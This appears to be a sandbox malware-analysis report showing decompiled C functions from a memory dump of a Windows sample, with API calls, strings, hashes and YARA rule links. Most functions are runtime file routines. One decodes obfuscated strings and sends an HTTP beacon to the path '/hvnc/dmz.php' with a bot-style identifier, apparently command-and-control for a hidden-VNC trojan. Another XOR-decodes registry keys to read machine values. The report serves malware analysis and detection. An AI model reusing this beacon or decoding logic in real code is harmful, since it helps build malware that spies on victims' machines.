									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0xb6a6c8 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0xb6a6c8 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0xb6a6c8 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0xb6a6c8 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0xb6a6c8 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E00B614F2(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0); // executed
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(_t164 != _t235) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E00B55B87(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E00B55BBD())) = 9;
											 *(E00B55BAA()) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0xb6a6c8 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E00B575AE();
												} else {
													_t170 = E00B578CE();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E00B57775(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0xb6a6c8 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E00B55BBD())) = 0xc;
									 *(E00B55BAA()) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E00B564B8(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							_t196 =  !_t210;
							__eflags = _t196 & 0x00000001;
							if((_t196 & 0x00000001) != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0xb6a6c8 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E00B55BAA()) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E00B55BBD())) = 0x16;
					goto L60;
				} else {
					 *(E00B55BAA()) =  *_t197 & 0x00000000;
					_t139 = E00B55BBD();
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54cdfdc1057a11d7edbf039dd65ce69a4c9739c0acd080901c6ac9eda42bd7a5
Instruction ID: fdb51c7f1fccf8dbfef3f838d011cc99422b6657446c7817168d18a25a10b921
Opcode Fuzzy Hash: 54cdfdc1057a11d7edbf039dd65ce69a4c9739c0acd080901c6ac9eda42bd7a5
Instruction Fuzzy Hash: DCC1B1B0A482459FDB11DF98E880BBDBBF0EF49312F1441D9ED05A7391CB749949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B497E3, Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00B497E3(void* __ebx, intOrPtr* __ecx, void* __edi, CHAR* __esi, void* __ebp) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v22;
				short _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				void _v44;
				signed int _t21;
				intOrPtr _t25;
				CHAR* _t32;
				intOrPtr _t36;
				intOrPtr* _t38;
				signed int _t40;
				void* _t42;
				intOrPtr _t53;
				intOrPtr* _t54;
				void* _t62;
				signed int _t67;
				signed int _t68;

				_t63 = __esi;
				_t67 =  &_v44;
				_t21 =  *0xb69014; // 0xce6f0fb5
				_v8 = _t21 ^ _t67;
				_t38 = __ecx;
				if( *0xb6afb8 == 0) {
					E00B4A313(__ecx, __esi, 0xb6ae90); // executed
					asm("movaps xmm0, [0xb3dde0]");
					_push(0xb6ae90);
					asm("movups [esp+0x18], xmm0");
					_v28 = 0;
					_t32 = E00B42846( &_v44);
					_t63 = 0xb6aeb8;
					wsprintfA(0xb6aeb8, _t32);
					_t67 = _t67 + 0xc;
					_v36 = 0x21362e22;
					_t5 =  &_v36; // 0x21362e22
					_v32 = 0x693c3c2b;
					_v28 = 0x22262727;
					_v24 = 0x2822;
					_v22 = 0;
					 *0xb6afc4 = E00B427F5(_t5);
					 *0xb6afc0 = 0x50;
					 *0xb6afc8 = 0xb6aeb8;
					 *0xb6afbc = 1; // executed
					E00B487BF(_t38, 0xb6afbc, 0xb6ae90, 0xb6aeb8, 0xb6afbc); // executed
					_t53 =  *0xb6afd4;
					_t36 =  *0xb6afd8; // 0x0
					 *0xb6afb8 = _t53;
					 *((char*)(_t36 + _t53)) = 0;
				}
				E00B4A313(_t38, _t63, 0xb6ae90);
				_t54 = _t38;
				_t40 = 8;
				memcpy( &_v44, 0xb6afbc, _t40 << 2);
				_t68 = _t67 + 0xc;
				_t62 = 0xb6afbc + _t40 + _t40;
				_v28 = _t38;
				_t14 = _t54 + 1; // 0x1
				_t42 = _t14;
				do {
					_t25 =  *_t54;
					_t54 = _t54 + 1;
				} while (_t25 != 0);
				_push(_t42);
				_v20 = _t54 - _t42 + 1;
				E00B497AB(_t38, _t54 - _t42 + 1);
				_t16 =  &_v40; // 0x21362e22
				_t45 = _t16;
				E00B487BF(_t38, _t16, _t62, 0xb6afbc, 0xb6afbc);
				E00B497AB(_v16, _v12);
				return E00B4AE43(_v8 ^ _t68, _t45);
			}

APIs

Part of subcall function 00B4A313: RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020119,?,00000000,00000000), ref: 00B4A37A
Part of subcall function 00B4A313: RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 00B4A3D2
Part of subcall function 00B4A313: wsprintfA.USER32 ref: 00B4A448
Part of subcall function 00B4A313: CharUpperBuffA.USER32(?,00000017), ref: 00B4A454
Part of subcall function 00B4A313: RegCloseKey.KERNELBASE(?), ref: 00B4A460

wsprintfA.USER32 ref: 00B49836

Part of subcall function 00B487BF: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B487DF
Part of subcall function 00B487BF: InternetConnectA.WININET(00000000,00000000,?,?,00000050,00000000,00000000,00000003), ref: 00B48831
Part of subcall function 00B487BF: HttpOpenRequestA.WININET(?,00160407,?,00000000,00000000,00000000,84680100,00000000), ref: 00B48892
Part of subcall function 00B487BF: HttpSendRequestA.WININET(00000000,00000000,00000000,242C2830,?), ref: 00B488AD
Part of subcall function 00B487BF: HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 00B488D9

Strings

".6!, xrefs: 00B49847
+<<i, xrefs: 00B4984B
''&", xrefs: 00B49853
D06ED63568F64E9A955C8, xrefs: 00B497FE, 00B4980E, 00B4981F, 00B498A7
/hvnc/dmz.php?D06ED63568F64E9A955C8, xrefs: 00B49830, 00B49835
"(, xrefs: 00B4985B

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: HttpOpen$InternetQueryRequestwsprintf$BuffCharCloseConnectInfoSendUpperValue
String ID: "($".6!$''&"$+<<i$/hvnc/dmz.php?D06ED63568F64E9A955C8$D06ED63568F64E9A955C8
API String ID: 574757977-2523003744
Opcode ID: aefaa3ec36880e45f20d1d31c2eb926c3c1501f472516e70ce1e5836e3fd54ec
Instruction ID: bee3d369e75fd5e682c3d05219aed4b6d96cae21d9a226a3ff1f9d6d51af1734
Opcode Fuzzy Hash: aefaa3ec36880e45f20d1d31c2eb926c3c1501f472516e70ce1e5836e3fd54ec
Instruction Fuzzy Hash: B631C2715083408BC709EF18E881A6BBBE4BFD9304F1005ADF085A72A1DFB95A499F97

Uniqueness

Uniqueness Score: -1.00%

Function 00B57229, Relevance: 7.6, APIs: 5, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00B57229(union _LARGE_INTEGER* __edx, void* _a4, union _LARGE_INTEGER _a8, intOrPtr _a12) {
				long _v8;
				void* _v12;
				union _LARGE_INTEGER* _v16;
				void* _v20;
				int _t17;
				signed int _t19;
				void* _t21;
				union _LARGE_INTEGER* _t25;

				_t25 = __edx;
				_push(1);
				if(SetFilePointerEx(_a4, 0, 0,  &_v20) == 0) {
					L1:
					_t19 = E00B55B87(GetLastError());
					L7:
					return _t19 | 0xffffffff;
				}
				_push(_a12);
				asm("cdq");
				_v12 = 0;
				_v8 = 0;
				_t17 = SetFilePointerEx(_a4, _a8, _t25,  &_v12); // executed
				__eflags = _t17;
				if(_t17 == 0) {
					goto L1;
				}
				_t21 = _v12;
				__eflags = _v8;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						L6:
						_push(0);
						SetFilePointerEx(_a4, _v20, _v16, 0);
						_t19 = E00B55BBD();
						 *_t19 = 0x16;
						goto L7;
					}
					__eflags = _t21 - 0x7fffffff;
					if(_t21 > 0x7fffffff) {
						goto L6;
					}
				}
				return _t21;
			}

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 00B5723F
GetLastError.KERNEL32(?,?,?), ref: 00B57249
__dosmaperr.LIBCMT ref: 00B57250
SetFilePointerEx.KERNELBASE(?,?,?,?,?), ref: 00B5726E
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 00B57294

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer$ErrorLast__dosmaperr
String ID:
API String ID: 1114809156-0
Opcode ID: a23c372d24e344cc6a4087b12bdb3a97facb6223cafd40d01f0b777b1525d680
Instruction ID: 348589393fa062bb7bc497f0fcd3f45cf349e94b481bb7395f86a4da128a54ee
Opcode Fuzzy Hash: a23c372d24e344cc6a4087b12bdb3a97facb6223cafd40d01f0b777b1525d680
Instruction Fuzzy Hash: 70018E31945118BBCB109F95DC08EDE7FB9EF06722F0002C5F824921A0CF728984DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B4A87E, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
registryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00B4A87E(void* __ebx, void* __edi, void* __esi) {
				signed int _t38;
				long _t45;
				void* _t48;
				void _t49;
				void _t50;
				void* _t62;
				int* _t64;
				char _t66;
				signed int _t69;
				intOrPtr* _t77;
				void* _t78;
				signed int _t79;
				void* _t81;
				void* _t90;
				void* _t91;
				signed int _t93;
				void* _t95;

				_t93 = _t95 - 0xd0;
				_t38 =  *0xb69014; // 0xce6f0fb5
				 *(_t93 + 0xcc) = _t38 ^ _t93;
				_push(__edi);
				 *(_t93 - 0x7c) = 1;
				 *(_t93 - 0x74) = 0;
				E00B4D0F0(__edi, _t93 - 0x34, 0, 0xff);
				asm("movaps xmm0, [0xb3dbd0]");
				asm("movups [ebp-0x70], xmm0");
				_t64 = 0;
				 *(_t93 - 0x78) = 0xff;
				asm("movaps xmm0, [0xb3dca0]");
				asm("movups [ebp-0x60], xmm0");
				 *((intOrPtr*)(_t93 - 0x50)) = 0xd071312;
				 *((intOrPtr*)(_t93 - 0x4c)) = 0x15033310;
				 *((intOrPtr*)(_t93 - 0x48)) = 0x505001b;
				 *((char*)(_t93 - 0x44)) = 0;
				do {
					_t11 = _t64 + 0x40; // 0x40
					 *(_t93 + _t64 - 0x70) =  *(_t93 + _t64 - 0x70) ^ _t11;
					_t64 = _t64 + 1;
				} while (_t64 < 0x2c);
				 *((char*)(_t93 - 0x44)) = 0;
				_t45 = RegOpenKeyExA(0x80000002, _t93 - 0x70, 0, 0x20019, _t93 - 0x74); // executed
				if(_t45 == 0) {
					 *((intOrPtr*)(_t93 - 0x40)) = 0x2f2b3402;
					 *((intOrPtr*)(_t93 - 0x3c)) = 0x25270920;
					 *((short*)(_t93 - 0x38)) = 0x310d;
					 *((char*)(_t93 - 0x36)) = 0;
					RegQueryValueExA( *(_t93 - 0x74), E00B4282B(_t93 - 0x40), 0, _t93 - 0x7c, _t93 - 0x34, _t93 - 0x78); // executed
				}
				_push(0x104);
				_t62 = E00B509A2();
				_t77 = _t93 - 0x34;
				_t90 = _t62 - _t77;
				do {
					_t66 =  *_t77;
					 *((char*)(_t77 + _t90)) = _t66;
					_t77 = _t77 + 1;
				} while (_t66 != 0);
				 *((intOrPtr*)(_t93 - 0x40)) = 0x757a391f;
				 *((intOrPtr*)(_t93 - 0x3c)) = 0x2e342409;
				 *((short*)(_t93 - 0x38)) = 0x29;
				_t48 = E00B42D10(_t93 - 0x40);
				_t78 = _t48;
				_t91 = _t48;
				do {
					_t49 =  *_t78;
					_t78 = _t78 + 1;
				} while (_t49 != 0);
				_t79 = _t78 - _t91;
				_t34 = _t62 - 1; // -1
				_t81 = _t34;
				do {
					_t50 =  *(_t81 + 1);
					_t81 = _t81 + 1;
				} while (_t50 != 0);
				_t69 = _t79 >> 2;
				memcpy(_t81, _t91, _t69 << 2);
				memcpy(_t91 + _t69 + _t69, _t91, _t79 & 0x00000003);
				return E00B4AE43( *(_t93 + 0xcc) ^ _t93);
			}

APIs

RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020019,?,00000000,?,00000000), ref: 00B4A911
RegQueryValueExA.KERNELBASE(?,00000000,00000000,?,?,?), ref: 00B4A94B

Strings

$4., xrefs: 00B4A97B

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: OpenQueryValue
String ID: $4.
API String ID: 4153817207-83132562
Opcode ID: 7f5917d6bbaf39be4595a6c3cf6a68adaf38baa308cc6780f946580f3bec1c6a
Instruction ID: f524b3aa817b0ef596cd5cbfada8d9400b688f836806561829ac46d44d35a8bf
Opcode Fuzzy Hash: 7f5917d6bbaf39be4595a6c3cf6a68adaf38baa308cc6780f946580f3bec1c6a
Instruction Fuzzy Hash: CB41B471D0425C9FDB25DFA9DC90AEEBBB8FF44304F20026DE845A7212EB705A49DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B58BA1, Relevance: 4.6, APIs: 3, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B58BA1(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				int _t15;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E00B5B205(_t33) != 0xffffffff) {
					_t13 =  *0xb6a6c8; // 0x7d73c0
					if(_t33 != 1 || ( *(_t13 + 0x98) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x60) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E00B5B205(2);
						if(E00B5B205(1) == _t21) {
							goto L1;
						}
						L7:
						_t15 = FindCloseChangeNotification(E00B5B205(_t33)); // executed
						if(_t15 != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E00B5B174(_t33);
						 *((char*)( *((intOrPtr*)(0xb6a6c8 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x38)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E00B55B87(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00B58AD7,?,00B66260,0000000C,00B58B7F,?), ref: 00B58BF7
GetLastError.KERNEL32(?,00B58AD7,?,00B66260,0000000C,00B58B7F,?), ref: 00B58C01
__dosmaperr.LIBCMT ref: 00B58C2C

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 32f02c999e3a5711010a6f2b330c117dd9b203db9df4d6cec69440d2d8cf968a
Instruction ID: 666438eef93175f40b545349cb120b431389e4131f8b5748c2c742d9fa658d3c
Opcode Fuzzy Hash: 32f02c999e3a5711010a6f2b330c117dd9b203db9df4d6cec69440d2d8cf968a
Instruction Fuzzy Hash: 52012B326051245BDA211634A885F7D27DDCB82B37F2902DDFD15BB1E1EF678C8D4260

Uniqueness

Uniqueness Score: -1.00%

Function 00B571AB, Relevance: 4.6, APIs: 3, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00B571AB(void* __ecx, void* __eflags, signed int _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16) {
				signed int _v8;
				void* _v12;
				void* _t15;
				int _t16;
				signed int _t19;
				signed int _t32;
				signed int _t33;
				signed int _t36;

				_t36 = _a4;
				_push(_t32);
				_t15 = E00B5B205(_t36);
				_t33 = _t32 | 0xffffffff;
				if(_t15 != _t33) {
					_push(_a16);
					_t16 = SetFilePointerEx(_t15, _a8, _a12,  &_v12); // executed
					if(_t16 != 0) {
						if((_v12 & _v8) == _t33) {
							goto L2;
						} else {
							_t19 = _v12;
							_t39 = (_t36 & 0x0000003f) * 0x38;
							 *( *((intOrPtr*)(0xb6a6c8 + (_t36 >> 6) * 4)) + _t39 + 0x28) =  *( *((intOrPtr*)(0xb6a6c8 + (_t36 >> 6) * 4)) + 0x28 + (_t36 & 0x0000003f) * 0x38) & 0x000000fd;
						}
					} else {
						E00B55B87(GetLastError());
						goto L2;
					}
				} else {
					 *((intOrPtr*)(E00B55BBD())) = 9;
					L2:
					_t19 = _t33;
				}
				return _t19;
			}

APIs

SetFilePointerEx.KERNELBASE(00000000,?,?,00000000,00000002,?,00000000,?,?,?,00B572E9,00000000,?,?,00000002), ref: 00B571E4
GetLastError.KERNEL32(?,00B572E9,00000000,?,?,00000002,?,00B51304,?,00000000,00000000,00000001,?,?,?,00B513BA), ref: 00B571EE
__dosmaperr.LIBCMT ref: 00B571F5

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 4acc9260e732fd3cd2c5e0d025cf6a72a9b685d01a9a1414b847b9647b70cdee
Instruction ID: 7d1ac932b3254300415ea7d6f8ea590f57451a20f0bdb84603ab63e56c799dce
Opcode Fuzzy Hash: 4acc9260e732fd3cd2c5e0d025cf6a72a9b685d01a9a1414b847b9647b70cdee
Instruction Fuzzy Hash: 4C012D327145186FCB158F54EC45EAE3B69DB85332B2402C5FC11A7190EE71DD408BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B42D46, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00B42D46(void* __ebx, void* __edi, void* __esi) {
				signed int _t20;
				intOrPtr* _t24;
				void _t27;
				void _t28;
				void* _t31;
				void _t32;
				void _t33;
				void* _t34;
				void* _t36;
				void _t37;
				void _t38;
				int _t41;
				intOrPtr* _t45;
				char _t49;
				signed int _t51;
				signed int _t57;
				signed int _t64;
				void* _t72;
				void* _t73;
				signed int _t74;
				void* _t75;
				signed int _t76;
				void* _t77;
				signed int _t78;
				void* _t80;
				void* _t85;
				void* _t90;
				void* _t97;
				void* _t98;
				void* _t99;
				char* _t102;
				signed int _t104;
				void* _t106;
				void* _t107;
				void* _t108;

				_t20 =  *0xb69014; // 0xce6f0fb5
				 *(_t104 + 0xc) = _t20 ^ _t104;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t45 = 0xb6ab00;
				E00B4A476(0xb6ab00, __edi, __esi, 0xb6ab00);
				_push(0x104);
				_t102 = E00B509A2();
				do {
					_t24 = E00B5187C( *_t45);
					_t72 = _t102 - _t24;
					do {
						_t49 =  *_t24;
						 *((char*)(_t72 + _t24)) = _t49;
						_t24 = _t24 + 1;
					} while (_t49 != 0);
					 *((char*)(_t104 + 0x11)) = _t49;
					 *((char*)(_t104 + 0x11)) = _t49;
					_t73 = _t104 + 0x10;
					 *(_t104 + 0x10) = 0x5c;
					_t97 = _t73;
					do {
						_t27 =  *_t73;
						_t73 = _t73 + 1;
					} while (_t27 != 0);
					_t74 = _t73 - _t97;
					_t7 = _t102 - 1; // -1
					_t80 = _t7;
					do {
						_t28 =  *(_t80 + 1);
						_t80 = _t80 + 1;
					} while (_t28 != 0);
					_t51 = _t74 >> 2;
					memcpy(_t80, _t97, _t51 << 2);
					_t54 = _t74 & 0x00000003;
					memcpy(_t97 + _t51 + _t51, _t97, _t74 & 0x00000003);
					_t106 = _t104 + 0x18;
					_t31 = E00B4A87E(_t45, _t97 + (_t74 & 0x00000003) + _t54, _t97);
					_t75 = _t31;
					_t98 = _t31;
					do {
						_t32 =  *_t75;
						_t75 = _t75 + 1;
					} while (_t32 != 0);
					_t76 = _t75 - _t98;
					_t10 = _t102 - 1; // -1
					_t85 = _t10;
					do {
						_t33 =  *(_t85 + 1);
						_t85 = _t85 + 1;
					} while (_t33 != 0);
					 *((intOrPtr*)(_t106 + 0x14)) = 0x2f2e256e;
					_t57 = _t76 >> 2;
					_t34 = memcpy(_t85, _t98, _t57 << 2);
					_t107 = _t106 + 0xc;
					 *(_t107 + 0x18) = _t34;
					memcpy(_t98 + _t57 + _t57, _t98, _t76 & 0x00000003);
					_t108 = _t107 + 0xc;
					_t15 = _t108 + 0x14; // 0x2f2e256e
					_t36 = E00B432BE(_t15);
					_t77 = _t36;
					_t99 = _t36;
					do {
						_t37 =  *_t77;
						_t77 = _t77 + 1;
					} while (_t37 != 0);
					_t78 = _t77 - _t99;
					_t16 = _t102 - 1; // -1
					_t90 = _t16;
					do {
						_t38 =  *(_t90 + 1);
						_t90 = _t90 + 1;
					} while (_t38 != 0);
					_t64 = _t78 >> 2;
					memcpy(_t90, _t99, _t64 << 2);
					memcpy(_t99 + _t64 + _t64, _t99, _t78 & 0x00000003);
					_t104 = _t108 + 0x18;
					_t41 = PathFileExistsA(_t102); // executed
					if(_t41 == 0) {
						goto L16;
					}
					L19:
					return E00B4AE43( *(_t104 + 0x1c) ^ _t104);
					L16:
					_t45 = _t45 + 4;
				} while (_t45 < 0xb6ab14);
				goto L19;
			}

APIs

PathFileExistsA.KERNELBASE(00000000), ref: 00B42E25

Strings

n%./, xrefs: 00B42DF5

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ExistsFilePath
String ID: n%./
API String ID: 1174141254-1693314898
Opcode ID: f1e1ced64d7fae8018740468018a1771f310f521d7ac16ef475ecd5420f92844
Instruction ID: 259f117bf15c2ba9ce1c758bb0e0fab2b600c603449dc53bdcd629e24d21d660
Opcode Fuzzy Hash: f1e1ced64d7fae8018740468018a1771f310f521d7ac16ef475ecd5420f92844
Instruction Fuzzy Hash: 9E315C516086420F5F19DF3C58212BFBBD2EFD634078445E8E8D297346DE215E0EE7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00B50A3F, Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00B50A3F(signed int __edx, intOrPtr* _a4) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t58;
				signed int _t59;
				signed char _t61;
				signed int _t63;
				signed char _t70;
				signed char _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t76;
				void* _t77;
				intOrPtr _t78;
				signed int _t86;
				intOrPtr _t90;
				signed int _t91;
				signed int _t92;
				intOrPtr* _t93;
				signed char _t94;
				signed int _t95;
				signed int _t96;
				signed int _t98;
				signed int _t102;
				signed int _t106;
				signed int _t108;
				signed int _t111;
				intOrPtr* _t112;
				void* _t115;
				void* _t116;

				_t97 = __edx;
				if(_a4 != 0) {
					_t58 = E00B572EE(_a4);
					_t90 = _a4;
					_t106 = _t58;
					__eflags =  *(_t90 + 8);
					if( *(_t90 + 8) < 0) {
						 *(_t90 + 8) = 0;
					}
					_t59 = E00B572B8(_t106, 0, 0, 1); // executed
					_t91 = _t97;
					_t116 = _t115 + 0x10;
					_v12 = _t91;
					_t111 = _t59;
					_v24 = _t111;
					__eflags = _t91;
					if(__eflags > 0) {
						L7:
						_t61 =  *(_a4 + 0xc);
						__eflags = _t61 & 0x000000c0;
						if((_t61 & 0x000000c0) != 0) {
							_t63 = _t106 >> 6;
							_t92 = (_t106 & 0x0000003f) * 0x38;
							_v16 = _t63;
							_v20 = _t92;
							_t93 = _a4;
							_v8 =  *((intOrPtr*)(_t92 +  *((intOrPtr*)(0xb6a6c8 + _t63 * 4)) + 0x29));
							_t94 =  *(_t93 + 0xc);
							asm("cdq");
